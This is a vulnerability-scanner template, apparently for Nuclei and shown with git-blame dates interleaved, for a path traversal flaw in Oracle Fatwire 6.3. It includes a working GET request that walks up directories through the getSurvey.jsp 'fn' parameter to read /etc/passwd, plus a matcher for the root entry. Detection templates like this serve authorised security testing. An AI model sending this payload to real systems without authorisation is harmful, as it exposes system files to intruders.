2022-03-26 09:26:13 +00:00
|
|
|
id: oracle-fatwire-lfi
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Oracle Fatwire 6.3 - Path Traversal
|
|
|
|
author: Bernardo Rodrigues @bernardofsr
|
2022-05-30 15:04:24 +00:00
|
|
|
severity: high
|
2022-05-31 09:18:35 +00:00
|
|
|
description: |
|
|
|
|
Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/50167
|
2022-05-30 15:04:24 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
|
|
cvss-score: 8.6
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: lfi,oracle,fatwire,edb
|
2022-03-26 09:26:13 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-05-30 15:04:24 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/30
|